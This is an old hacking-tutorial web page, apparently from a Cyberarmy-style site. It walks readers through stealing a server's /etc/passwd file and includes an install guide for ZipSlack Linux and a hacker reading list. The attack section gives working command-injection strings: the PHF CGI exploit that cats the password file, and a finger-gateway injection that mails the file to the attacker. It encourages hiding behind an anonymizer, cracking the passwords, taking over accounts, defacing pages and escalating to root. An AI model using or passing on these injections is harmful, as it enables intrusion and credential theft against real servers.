  <p align="center"><font face="Arial" size="3">[<a href="#CONGRATULATIONS:">Yes! I Got Me
  Some Decrypted Passwords!</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#THE OLD-STYLE PHF TECHNIQUE:">Nah,
  the Encryption was too Good</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a
  href="http://www.cyberarmy.com/tute/htext4.shtml">Give me some reading about all the different
  password crackers, where to find them, etc.</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="THE OLD-STYLE PHF TECHNIQUE:">THE OLD-STYLE PHF
  TECHNIQUE:</a></font></p>
  <p><font face="Arial" size="3">Although most servers have now trashed a program called
  PHF, let's just make sure... It is is working, it lets you get the passwd file remotely,
  even if it is inside hidden and root access only directories.</font></p>
  <font size="3"><p><font face="Arial">In the Overlord Anonymizer, type:</font></p>
  <p><font face="Arial">http://www.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script>/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.</font></font></p>
  <form method="POST"
  action="http://24.128.82.114:8800/687474703a2f2f7777772e6f73697269732e6d6c2e6f72672f7e627269616e722f616670702f676f646f69742e636769">
    <div align="center"><center><table border="0" width="31%">
      <tr>
        <td width="50%"><div align="left"><p><font face="Arial" color="#00FF00"><small><small>OVERLORD
        ANONYMIZER</small></small></font><font color="#008080" face="Arial"><br>
        <small><input type="TEXT" size="40" maxlen="512" name="url" value="http://"></small></font></td>
        <td width="50%" align="center"><input type="submit" value="Submit" name="B1"></td>
      </tr>
    </table>
    </center></div>
  </form>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3">If PHF is active (often not), this string will print out
  the etc/passwd file strait to your web browser all you need to do is save it as a file and
  again run a crack program against it.</font></p>
  <p><font face="Arial" size="3">Now, if you see the words 'Smile! You're on Candid
  Camera!', it means that the server is protected against this hack, and has logged your IP.
  But don't worry. So long as you were using the anonymizer, you are safe.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#FINGER BOX HACKING:">Nah, they
  fixed that PHF Bug Problem</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#DECRYPTING PASSWD FILES:">Yes! I
  Got Me Some Encrypted Passwords!</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p align="left"><a name="FINGER BOX HACKING:"><font face="Arial" size="3">FINGER BOX
  HACKING:</font></a></p>
  <font FACE="Courier New" SIZE="2"><p></font><font face="Arial" size="3">Finger servers are
  hacker's friends. Let's find out whether www.<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font
  size="3"><font face="Arial"> has a finger server.</font></p>
  <p><font face="Arial">In the Anonymizer, assuming that the server's name starts with www,
  type www.</font></font><font face="Arial" size="3"><script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font
  size="3"><font face="Arial">/cgi-bin/finger</font></p>
  <form method="POST"
  action="http://24.128.82.114:8800/687474703a2f2f7777772e6f73697269732e6d6c2e6f72672f7e627269616e722f616670702f676f646f69742e636769">
    <div align="center"><center><table border="0" width="31%">
      <tr>
        <td width="50%"><div align="left"><p><font face="Arial" color="#00FF00"><small><small>OVERLORD
        ANONYMIZER</small></small></font><font face="Arial" color="#008080"><br>
        <small><input type="TEXT" size="40" maxlen="512" name="url" value="http://"></small></font></td>
        <td width="50%" align="center"><input type="submit" value="Submit" name="B1"></td>
      </tr>
    </table>
    </center></div>
  </form>
  <p><font face="Arial">If the finger gateway is operational a box should appear for you to
  enter the name you want to finger. If it is operational you have another chance to receive
  the etc/passwd file.</font></p>
  <p><font face="Arial">Okay, 1/ get your list of e-mail addresses you found for the site
  (let's pretend one of them is &quot;kangaroo@</font></font><font face="Arial" size="3"><script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font size="3"><font face="Arial">&quot;, and that
  your email address is &quot;your@email.org&quot;)</font></p>
  <p><font face="Arial">2/ Go back to the finger box, and type this in (changing these email
  addresses for the real ones):</font></p>
  <p><font face="Arial">kangaroo@</font></font><font face="Arial" size="3"><script
  LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font size="3"><font face="Arial">; /bin/mail
  your@email.org &lt; etc/passwd</font></p>
  <p><font face="Arial">This takes the passwd file through </font></font><font face="Arial"
  size="3">kangaroo@<script LANGUAGE="JavaScript"><!---------- JavaScript begins...
document.writeln (Name);
// JavaScript ends ----------></script></font><font size="3"><font
  face="Arial"> and emails it to your email address. If this works you now have the
  etc/passwd file in your mailbox.... you can now run a crack program against it and have a
  little fun on their box.</font></p>
  </font><p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#LINUX INSTALLATION">Nah, it
  didn't work</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#DECRYPTING PASSWD FILES:">Yes! I
  Got Me Some Encrypted Passwords!</a>]</font></p>
  <hr>
  <p align="center">&nbsp;</p>
  <p align="left"><font face="Arial"><a name="LINUX INSTALLATION">LINUX INSTALLATION</a></font></p>
  <p align="left"><font color="#00FF00" face="Arial">All the above really has given you the
  basic ideas. To do anything firther, and impliment any real exploits, you will have to put
  a Linux operating system on your computer. Below are some instructions on how to quickly
  and easily install Linux on your computer. You can just download the files below for free,
  and install them in a directory on your MS-DOS / Windows system! That's right, you dont
  even have to repartition your Hard Drive!</font></p>
  <p align="left"><font color="#00FF00" face="Arial">Okay... I will make this as basic and
  free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux
  before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You
  know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and
  easy to set up.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">1/ <a
  href="ftp://sunsite.anu.edu.au/pub/linux/distributions/slackware/zipslack/zipslack.zip">Download
  this file</a> (Australia). It's big, like 34MB. But it's all you need. If the site there
  is overloaded, get it <a
  href="ftp://ftp.cdrom.com/pub/linux/slackware/zipslack/zipslack.zip">here</a>.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">2/ What you have is a version of
  Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up.
  I don't use Slackware, and there are some better versions around now - like RedHat 5.2.
  But, it is a good stable version - and, like I say, very simple to download and setup.
  Good for a Linux test drive.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">3/ Ok, make a directory called 'Linux'
  on your Hard Drive. That's right, with this distro, you dont even have to repartition your
  drive. It can be on the same Hard Drive you have Windows on! (I told you this would be
  easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a
  subdirectory anywhere.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">4/ Now, just unzip all the contents of
  the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">5/ Now, heres the hardest part. You
  will have to edit the \linux\linux.bat file. Open it in an editor.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">6/ <font size="3">Y</font></font><font
  color="#00FF00" size="3" face="Arial">ou'll need to edit the LINUX.BAT file, and make sure
  the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive,
  you can make the line:</font></p>
  <blockquote>
    <p align="left"><font color="#00FF00" face="Arial">\linux\loadlin \linux\vmlinuz
    root=/dev/hda1 (hda1 means the IDE1 Master HDD)</font></p>
  </blockquote>
  <p align="left"><font color="#00FF00" face="Arial">I have Linux on my drive D: (the IDE2
  Master HDD), and for me the line would be:</font></p>
  <blockquote>
    <p align="left"><font color="#00FF00" face="Arial">\linux\loadlin \linux\vmlinuz
    root=/dev/hdc1</font></p>
  </blockquote>
  <p align="left"><font color="#00FF00" face="Arial">7/ If you are unsure, the Linux.bat
  file has a long list of examples. Just guess. </font><font color="#00FF00" size="3"
  face="Arial">If you get it wrong, you'll still be able to use scrollback (right shift key
  and PageUp) when the kernel halts to go back and look at your partitions, noting the names
  Linux gives them. With this information, you should be able to edit the LINUX.BAT
  correctly.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">8/ Well, I skipped ahead of myself. You
  are now (already) ready to boot up your Linux system. Who said it was hard?</font></p>
  <p align="left"><font color="#00FF00" face="Arial">9/ Ok, you must go 'Shut Down' and
  'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run
  Linux.bat</font></p>
  <p align="left"><font color="#00FF00" face="Arial">10/ The Linux system will load itself
  over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so
  only linux loads).</font></p>
  <p align="left"><font color="#00FF00" face="Arial">11/ You will see a whole lot of stuff
  loading. Then you will see a login: prompt.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">12/ You have an operating system just
  like all the big net servers have!</font></p>
  <p align="left"><font color="#00FF00" face="Arial">13/ Okay, just type in 'root', and you
  have root access on the system. You will want to give yourself a password, so type
  'passwd'. Choose something you will remember. Without it, you cannot log in.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">14/ Now you will have a black screen
  with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few
  commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico'
  (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes
  with zipslack).</font></p>
  <p align="left"><font color="#00FF00" face="Arial">15/ Now, type 'setup'.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">16/ Setup your mouse, network settings,
  screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">17/ Now, if you want net access,
  through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You
  will need to know all your internet settings, like your Gateway, Nameserver numbers, etc.
  If you dont know these, go back to windows and see what values you used from the Control
  Panel : Internet section.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">18/ Okay. Reboot. Your mouse should be
  working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If
  you have a standard external modem on Com 2, it is probably okay. Otherwise, it's
  sometimes a pain to configure your modem for Linux.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">19/ If you are having modem troubles,
  type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then
  'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual
  config section. Uncomment&nbsp; /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2
  or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to
  Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for
  your modem. If you are in Win95, I think you have to run something called msd.com in the
  \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the
  place where it says to call the serials.rc file.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">20/ If you have a CD-Rom you can also
  edit S.rc so that it checks for a CD Rom during bootup.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">21/ All things going well, you should
  now have a fully functional Unix type system on your computer. You can download all your
  latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth
  port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'.
  Real easy. If it is a C program, type 'gcc program.c' to compile it.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">22/ Well, you are missing a Windows
  type interface. You dont need one. But if you want to surf using Linux, etc. It is better
  to have a graphical interface - although you can run a browser called 'lynx' just through
  the vanilla Linux interface.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">23/ You can get some things, like
  X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/</font></p>
  <p align="left"><font color="#00FF00" face="Arial">24/ Just get all the files that look
  vital (about 8 of them), and run pkgtool to install them all. You will probably find that
  setting up X-Win for the first time is a huge pain. It was for me at least - you need to
  know, for example, the horizontal and vertical refresh rates of your monitor. Then, get
  something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">25/ You will have fun tweaking
  everything as you like it. There are dozens of windows interfaces to choose from. Some
  looks almost identical to Win95.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">26/ Where from here? You can now do
  practically anything - you basically have all the net power your ISP does, except for all
  the phone lines. You can let people use you as a dial up ISP, you can host web pages and
  set up FTP sites to run from your computer. You can set up email addresses, nameservers...
  anything.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">27/ Because Linux is&nbsp; the same
  software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands
  to other servers. You can ask other servers about themselves. For example, type 'showmount
  -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your
  command line. You can send mail from your own sendmail program so that it is &nbsp;
  untraceable.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">Some last incentives, if you were
  brought up in the Windows world and are afraid of command prompts, just type 'mc'. The
  zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few
  games on the things. There are a few old favourites installed by default - like 'trek',
  and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean.
  The games directory is in usr/games.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">If you have got any more problems,
  there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If
  your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there.
  Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).</font></p>
  <p align="left"><font color="#00FF00" face="Arial">Fact is, when you got this all working
  for a few weeks (and probably loving it), you will no doubt like to try some more advanced
  Linux distros. Although there are a lot of personal feelings about various distributions,
  I recommend RedHat 5.2 Linux. You will find it very easy to install.</font></p>
  <p align="left"><font color="#00FF00" face="Arial">If you are happy buying through
  Amazon.Com, <a href="http://www.amazon.com/exec/obidos/ASIN/0789717468/thehakkershomepa">here
  is</a> the best Linux deal I've been able to find anywhere. It deals with the 3 major
  Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very
  good install guide. All for about half the price of the single 'official' RedHat CD. If
  you like this Linux stuff, I recommend you get it - or at least make sure you get a book
  that is written very recently.</font><!--#exec cgi="/ssi/footer.cgi" --></p>
  <p align="left"><font color="#00FF00" face="Arial">&nbsp;</font></p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#CURRENT LIMIT:">Nah, it didn't
  work</a>]</font></p>
  <p align="center"><font face="Arial" size="3">[<a href="#DECRYPTING PASSWD FILES:">Yes! I
  Got Me Some Encrypted Passwords!</a>]</font></p>
  <hr>
  <p align="left"><a name="CURRENT LIMIT:"><font face="Arial" size="3">CURRENT LIMIT:</font></a></p>
  <p><font face="Arial" size="3">You have reached the current limit of the tutorials.... I
  will add further steps when I get the time and if people like these lessons. Also, if
  people want to write sections up for this, just mail the sections to me, to the e-mail
  address listed at Cyberarmy.Com.</font></p>
  <p><font face="Arial" size="3">Until this gets bigger, I can suggest a few books that
  teach hacking. I've found that a lot of books are rubbish and just teach how to change
  screen colours, but there are a few that every hacker should have in their library.</font></p>
  <p>&nbsp;</p>
  <p><font face="Arial">THE ESSENTIAL HACKER'S LIBRARY:</font></p>
  <p><font face="Arial">ESSENTIAL BOOKS:</font></p>
  <p><font face="Arial">1. <a
  href="http://www.amazon.com/exec/obidos/ASIN/1575212684/thehakkershomepa">MAXIMUM SECURITY</a>:
  Of course, Maximum Security has to be at number one. I guess this would probably be the
  central book in any hacker's library. Goes through a heap of techniques like a textbook
  with over 900 pages.</font></p>
  <p><font face="Arial">2. <a
  href="http://www.amazon.com/exec/obidos/ASIN/0929408217/thehakkershomepa">THE HAPPY HACKER</a>:
  &nbsp; Essential for newbies. Although this book is bagged a lot by people who hate
  Carolyn, I think most people agree it would be the perfect first book a newbie should
  read. Explains things pretty well, spelling mistakes, but probably an essential newbie
  primer. Thou, as I say, if you know your stuff you can safely forget this one.</font></p>
  <p>&nbsp;</p>
  <p><font face="Arial">ESSENTIAL SOFTWARE:</font></p>
  <p><font face="Arial">1. <a
  href="http://www.amazon.com/exec/obidos/ASIN/0789717468/thehakkershomepa" TARGET="_top">LINUX</a>:
  You will <em>need</em> to change to Linux to do any serious hacking. But thankfully, it is
  fairly simple and you can just set up Linux in a seperate partition on your Hard Drive and
  set for a dual boot option: usually windows, and when you are hacking, Linux. You amount
  of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest
  version not an obsolete one. There are also several different 'flavours' of Linux, you
  will probably want to start with RedHat, then possibly move to Slackware after a year or
  so. So, make sure you get a deal which gives you the oportunity to check out some of the
  different distributions. <em>By far</em> the best Linux deal I've found around <a
  href="http://www.amazon.com/exec/obidos/ASIN/0789717468/thehakkershomepa" TARGET="_top">is
  this one</a>. It has an excellent Linux manual, and comes with three seperate Linux
  distributions on 3 CDs, including the very latest RedHat <em>and</em> Slackware. It's also
  excellent value (about half the price of buying the single 'official' RedHat CD).</font></p>
  <p>&nbsp;</p>
  <p><font face="Arial">NOT ESSENTIAL, BUT RECOMMENDED BOOKS:<br>
  (These books are mainly just part of the Hacker Culture)</font></p>
  <p><font face="Arial">3. <a
  href="http://www.amazon.com/exec/obidos/ASIN/0316528579/thehakkershomepa">THE WATCHMAN</a>:
  The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you
  anything, so stuff it if you just want to learn. Although it was one of the best reads I
  ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about
  the same, but this one deals a lot with phreaking, and scamming radio stations of cars.
  But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn
  stuff.</font></p>
  <p><font face="Arial">4. <a
  href="http://www.amazon.com/exec/obidos/ASIN/0316528692/thehakkershomepa">THE FUGITIVE
  GAME</a>: Online With Kevin Mitnick: Again, a really fun read (though, I prefer the
  Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here
  because it is such a good read. It's also a really cheap buy.</font></p>
  <p><font face="Arial">5. <a
  href="http://www.amazon.com/exec/obidos/ASIN/0786889136/thehakkershomepa">TAKEDOWN</a> :
  The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story
  (written by the cops who chased him). Interesting, but the essential Mitnick book is the
  one above. Though, this is a very good primer on how the FBI operates to capture hackers.
  But, again, no techniqes listed. For techniques, you would only have luck in the first two
  books listed.</font></p>
  <p>&nbsp;</p>
  <p><font face="Arial">Okay, as for programming books - stuff it. You can download the
  things for free if you search for &quot;perl + programming + tutorial&quot; and things
  like that. Unless you like printed books, forget that. So, the only other thing is Linux.
  You will need to have Linux as a dual boot option on your PC if you want to do any serious
  hacking.</font></p>
  <p><font face="Arial">Some books that suck: these are some books that are going around
  that are a rip-off.&nbsp; <a
  href="http://www.amazon.com/exec/obidos/ASIN/1559501065/thehakkershomepa">SECRETS OF A
  SUPER HACKER</a>: This is another book that a lot of people have. The book seemed like a
  real waste of time to me.</font></p>
  <p><font face="Arial">So, keep going through this tutorial as it gets bigger, read
  anything you find on the web. Get some of the major books above, at least 1 and 2, and
  read them very carefully - four or five times. Join your local Linux users group, if you
  have one. And, later on, download a few guides on programming and read through them when
  you get some time. With some effort (it isn't easy), you can become a respected hacker and
  take control of the Net.</font></p>
  <p>&nbsp;</p>
  <p align="center"><font face="Arial" size="3"><img src="choices.GIF" width="120"
  height="40" alt="choices.GIF (538 bytes)"></font></p>
  <p align="center"><font face="Arial" size="3">[Back to <a href="logo.htm">Index</a>]</font></p>
  <hr>
  <p>&nbsp;</p>
  <p><font face="Arial" size="3"><a name="CONGRATULATIONS:">CONGRATULATIONS:</a></font></p>
  <p><font face="Arial" size="3">You have gained access.</font></p>
  <p><font face="Arial" size="3">If you now have the login code and password, you may use
  the users mail account, FTP priviliges (change their web pages by uploading new ones), and
  HTTP access.</font></p>
  <p><font face="Arial" size="3">(If you have only got access to a user level account, do
  not despair. If you have a user level account, it is easy to use that to later get a root
  level account. More on this when this study is made bigger).</font></p></blockquote>
<br><br>


